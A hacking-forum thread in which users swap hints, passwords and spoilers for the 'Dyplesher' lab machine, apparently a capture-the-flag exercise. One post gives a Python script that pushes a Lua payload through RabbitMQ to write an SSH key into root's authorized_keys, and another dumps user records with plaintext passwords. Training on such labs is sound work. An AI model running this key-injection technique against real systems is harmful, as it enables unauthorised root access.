Posts
38
Threads
8
Joined
Apr 2020
June 12, 2020 at 07:33 PM
This post was last modified: June 12, 2020 at 07:35 PM by user1337.
Halo...
Someone have free Dyplesher WriteUp or Hash..?
At this forum i have one free but the WriteUp its not clear to explain to me.
Thanks...
Posts
145
Threads
27
Joined
Aug 2019
1 Year of service
June 13, 2020 at 09:29 AM
Where do you stuck? Let me help you.
Posts
13
Threads
0
Joined
Nov 2019
1 Year of service
June 13, 2020 at 11:13 AM
(June 13, 2020 at 09:29 AM)Un1k0d3r Wrote: Where do you stuck? Let me help you.
Thank you for your helping offer.
I'm stuck in plugin development step.
Actually I hate java and don't like to install the whole stack to only create a plugin. So if you kindly give me the final code/plugin I'll appreciate it more ;)
Posts
38
Threads
8
Joined
Apr 2020
June 13, 2020 at 12:12 PM
(June 13, 2020 at 09:29 AM)Un1k0d3r Wrote: Where do you stuck? Let me help you.
Oke bro,
Now i'm on MinatoTW machine, and i'm try to create some lua plugin but i not understand where the lua plugin must be create? on the target machine or attacker machine?
i'm create the plugin on Minato machine but i'have not permision because the path of lua plugin is /root/..xxx/xxx_xxxx
Posts
23
Threads
9
Joined
Dec 2019
1 Year of service
June 13, 2020 at 04:13 PM
anyone have MinatoTW or yuntao password?
Posts
62
Threads
10
Joined
Jul 2017
3 Years of service
June 13, 2020 at 05:17 PM
have some freebies :P
(June 13, 2020 at 11:13 AM)thazurt Wrote: I'm stuck in plugin development step.
Actually I hate java and don't like to install the whole stack to only create a plugin. So if you kindly give me the final code/plugin I'll appreciate it more ;)
upload this, start the exploit "EXPLOIT" and check test.dyplesher.htb/?1=whoami
(June 13, 2020 at 12:12 PM)user1337 Wrote: Oke bro,
Now i'm on MinatoTW machine, and i'm try to create some lua plugin but i not understand where the lua plugin must be create? on the target machine or attacker machine?
i'm create the plugin on Minato machine but i'have not permision because the path of lua plugin is /root/..xxx/xxx_xxxx
Spoiler you have to send a request to the rabbitmq and tell it where to get the lua file from. you have to send it a link, i set a localhost link and started a little web server on the server to read the lua file. here's the script.
import pika
credentials = pika.PlainCredentials("yuntao","EashAnicOc3Op")
parameters = pika.ConnectionParameters('10.10.10.190',5672,'/',credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
# channel.queue_declare(queue="plugin_data", durable=True, exclusive=False, auto_delete=False)
channel.confirm_delivery()
while True:
channel.basic_publish(exchange='',
routing_key='plugin_data',
body="http://127.0.0.1:8000/script.lua",
properties=pika.BasicProperties(content_type='text/plain',
delivery_mode=1),
mandatory=True)
and serve this script.lua with your public key in it
local f=io.open("/home/root/.ssh/authorized_keys", "wb");
f:write("YOUR KEY HERE");
io.close(f);
and just ssh in as root
(June 13, 2020 at 04:13 PM)0x2019 Wrote: anyone have MinatoTW or yuntao password?
Spoiler {"name":"MinatoTW","email":"[email protected]","address":"India","password":"bihys1amFov","subscribed":true}
{"name":"yuntao","email":"[email protected]","address":"Italy","password":"wagthAw4ob","subscribed":true}
{"name":"felamos","email":"[email protected]","address":"India","password":"tieb0graQueg","subscribed":true}
Posts
1
Threads
0
Joined
May 2020
June 15, 2020 at 08:53 AM
(June 13, 2020 at 09:29 AM)Un1k0d3r Wrote: Where do you stuck? Let me help you. i need some help can u help me in PM??!
Posts
24
Threads
14
Joined
Nov 2019
1 Year of service
June 15, 2020 at 10:24 AM
dyplesher detailed writeup and password
https://kali-education.info/dyplesher/
pass: 03982d9919b3b35a81c80c47aadaf61b
Posts
38
Threads
8
Joined
Apr 2020
June 15, 2020 at 01:42 PM
(June 15, 2020 at 10:24 AM)tester_soldier Wrote: dyplesher detailed writeup and password
https://kali-education.info/dyplesher/
pass: 03982d9919b3b35a81c80c47aadaf61b
Good one writeup, very clear for learn....
|